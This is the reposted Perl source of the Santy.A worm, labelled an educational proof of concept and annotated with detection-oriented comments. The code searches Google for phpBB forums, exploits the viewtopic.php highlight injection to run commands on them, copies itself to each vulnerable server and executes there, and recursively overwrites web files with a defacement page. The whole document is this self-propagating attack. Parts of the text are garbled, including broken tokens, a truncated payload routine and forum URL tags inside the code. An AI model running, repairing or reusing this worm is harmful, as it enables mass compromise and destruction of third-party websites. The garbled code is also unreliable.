
Santy.A - phpBB <= 2.0.10 Web Worm Source Code (PoC)

Santy.A - phpBB <= 2.0.10 Web Worm Source Code (PoC)

信息来源:0day

Solution: upgrade to phpBB version 2.0.11.
#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
#                  ~~ For educational purpose ~~
#
# See : [url]http://isc.sans.org/diary.php?date=2004-12-21[/url]
#       [url]http://www.k-otik.com/news/20041221.phpbbworm.php[/url]
#       [url]http://www.f-secure.com/v-descs/santy_a.shtml[/url]
#
#!/usr/bin/perl
use
strict;
use Socket;


# Forward declarations for the subroutines defined further down.
sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();

sub GrabURL($);
sub str2chr($);

# Detach from the launching process: the parent exits, the forked child carries on.
eval{ fork and exit; };

# Generation counter. The copy pushed to the next host has this line rewritten
# with the value incremented (see the s///e further down); a generation above 3
# runs the defacement payload (PayLoad) before propagating.
my $generation = x;
PayLoad() if $generation > 3;

# Load own source into $self, then remove the file from disk: from here on the
# worm exists only in memory, which is why an on-disk scan may miss it.
open IN, $0 or exit;
my $self = join &#39;&#39;, <IN>;
close IN;
unlink $0;

# Reachability check against Google. Without connectivity only a generation
# above 3 keeps running (payload only); otherwise the process exits.
while(!GrabURL(&#39;[url]http://www.google.com/advanced_search[/url]&#39;)) {
if($generation > 3)
{
PayLoad() ;
} else {
exit;
}
}

# Bump the generation number inside the in-memory copy that will be sent onward.
$self =~ s/my \$generation = (\d+);/&#39;my $generation = &#39; . ($1 + 1) . &#39;;&#39;/e;

# Indicators of compromise: the file name the copy is dropped under on a victim
# web server, and the marker string whose presence in a response confirms that
# the target executed the probe.
my $selfFileName = &#39;m1ho2of&#39;;
my $markStr = &#39;HYv9po4z3jjHWanN&#39;;
# Probe: a perl one-liner that creates $selfFileName containing $markStr,
# carried inside the crafted viewtopic.php "highlight" parameter (the phpBB
# <= 2.0.10 vulnerability named in the header).
my $perlOpen = &#39;perl -e "open OUT,q(>&#39; . $selfFileName . &#39;) and print q(&#39; . $markStr . &#39;)"&#39;;
my $tryCode = &#39;&highlight=%2527%252Esystem(&#39; . str2chr($perlOpen) . &#39;)%252e%2527&#39;;

# Main propagation loop: harvest candidate URLs, probe each, copy self to
# confirmed targets and start it there.
while(1) {
# Kill switch: a file named stop.it in the working directory halts the worm.
exit if -e &#39;stop.it&#39;;

OUTER: for my $url (GoGoogle()) {

exit if -e &#39;stop.it&#39;;

# Replace any existing highlight parameter with the probe and fetch the page.
$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
# Only a response that echoes the marker means the host ran the probe.
next unless $r =~ /$markStr/;

# Transfer own source in chunks of at most 20 bytes, each request appending
# one chunk to $selfFileName on the victim; abandon this host if any request
# fails. Each chunk is one web request, so a compromised server's access log
# shows a long burst of viewtopic.php hits with a highlight parameter.
while($self =~ /(.{1,20})/gs) {
my $portion = &#39;&highlight=%2527%252Efwrite(fopen(&#39; . str2chr($selfFileName) . &#39;,&#39; . str2chr(&#39;a&#39;) . &#39;),
&#39; . str2chr($1) . &#39;),exit%252e%2527&#39;;

$url =~ s/&highlight=.*$//;
$url .= $portion;

next OUTER unless GrabURL($url);
}

# Finally ask the victim to execute the dropped copy with perl.
my $syst = &#39;&highlight=%2527%252Esystem(&#39; . str2chr(&#39;perl &#39; . $selfFileName) . &#39;)%252e%2527&#39;;
$url =~ s/&highlight=.*$//;
$url .= $syst;

GrabURL($url);
}
}



# Rewrite $s so it can travel inside the crafted URL without any quote
# characters: each byte becomes a chr(...) expression built from its ord value,
# the expressions are joined by %252e (a double-URL-encoded "."), and the
# trailing separator is trimmed. Returns the encoded string; $s is a copy, so
# the caller's value is not modified.
sub str2chr($) {
my $s = shift;

$s =~ s/(.)/&#39;chr(&#39; . or d($1) . &#39;)%252e&#39;/seg;
$s =~ s/%252e$//;

return $s;
}


# Harvest candidate forum URLs from Google: one search for viewtopic.php links
# with a random "t"/"p"/"topic" id, following the numbered result pages, then
# extracting every http:// ... viewtopic.php ... link from the combined HTML.
# Returns the list of URLs; links that contain a second http:// (redirect-style
# URLs) are dropped. The fixed query shape is the worm's search-side signature.
sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
# Query: allinurl:"viewtopic.php" "<param>=<random id below 30000>", 100 results per page.
my $startURL = &#39;[url]http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all[/url]&#39; . &#39;&
q=allinurl%3A+%22viewtopic.php%22+%22&#39; . $ts[int(rand(@ts))] . &#39;%3D&#39; . int(rand(30000)) .
&#39;%22&btnG=Search&#39;;
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
# Pagination links are recognised by the nav_page.gif anchor markup of the
# Google result page of the time; every further page is appended to $allGoo.
my $r = &#39;<td><a href=(/search\?q=.+?)&#39; . &#39;><img src=/nav_page\.gif width=16 height=26
alt="" border=0><br>\d+</a>&#39;;
while($goo1st =~ m#$r#g) {
$allGoo . = GrabURL(&#39;[url]www.google.com[/url]&#39; . $1);
}
# Collect viewtopic.php links from all fetched result pages.
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
my $u = $1;
next if $u =~ m#[url]http://.[/url]*[url]http://#i;[/url] # no redirects
push(@urls, $u);
}

return @urls;
}


# Minimal HTTP/1.0 client over a raw socket: fetch $url (a leading http:// is
# optional) and return the whole response, headers and body, as one string.
# Returns an empty list on any failure: unparsable URL, name resolution,
# socket creation or connect. No TLS, no redirects, no retries. Server is a
# bareword (package-global) handle, so the routine is not reentrant.
sub GrabURL($) {
my $url = shift;
$url =~ s#^[url]http://##i;[/url]

# Split into host[:port] and the request path; both parts are required.
my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);

# Request headers. The fixed User-Agent string together with a Referer equal
# to the requested URL itself is a stable signature in web-server logs.
my $r =
"GET $resHTTP/1.0\015\012" .
"Host: $host\015\012" .
"Accept:*/*\015\012" .
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: http://" . $host . $res . "\015\012" .

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" .
"Connection: close\015\012\015\012";

# Optional :port suffix on the host; default 80.
my $port = 80;
if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;}

my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname(&#39;tcp&#39;)) or return;
# Attempts to set a receive timeout; the option value is passed as a plain
# integer and the return value is not checked.
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);

connect(Server, sockaddr_in($port, $internet_addr)) or return;
# Unbuffer the socket handle, send the request, then read until the peer closes.
select((select(Server), $| = 1)[0]);
print Server $r;

my $answer = join &#39;&#39;, <Server>;
close (Server);

return $answer;
}


# Defacement payload: replace the file named in $_[0] with a static HTML page.
# The title "This site is defaced!!!" and the ADDRESS line
# "NeverEverNoSanity WebWorm generation N" (N from the file-level $generation)
# are the on-disk indicators of a host that ran the payload. Returns nothing;
# a file that cannot be opened for writing is skipped silently.
sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
<BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
. $generation .q{.</b></ADDRESS>
</BODY></HTML>
};

# The original is unlinked before the replacement is written, so its content
# is not recoverable from the file itself; restore from backups.
unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}


# Recursively walk the directory $_[0] and hand every entry whose name contains
# .htm, .php, .asp, .shtm, .jsp or .phtm (case-insensitive and unanchored, so
# .html, .php3 and similar match too) to DoFile. Symbolic links are never
# descended into, though a link whose name matches is still passed to DoFile.
# A directory that cannot be opened is silently ignored. Returns nothing.
sub DoDir($) {

my $dir = $_[0];
$dir .= &#39;/&#39; unless $dir =~ m#/$#;

# Localised bareword handle so each recursive call gets its own DIR.
local *DIR;
opendir DIR, $dir or return;

for my $ent (grep { $_ ne &#39;.&#39; and $_ ne &#39;..&#39; } readdir DIR) {

# Recurse into real directories only; -d reuses the stat buffer (_) from -l.
unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}

if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}

closedir DIR;
}


sub Pay Load() {

my @dirs;


eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};

push(@dirs, &#39;/ &#39;);

for my $l (&#39;A&#39; .. &#39;Z&#39;) {
push(@d
for my $d (@dirs) {
DoDir($d);
}
}

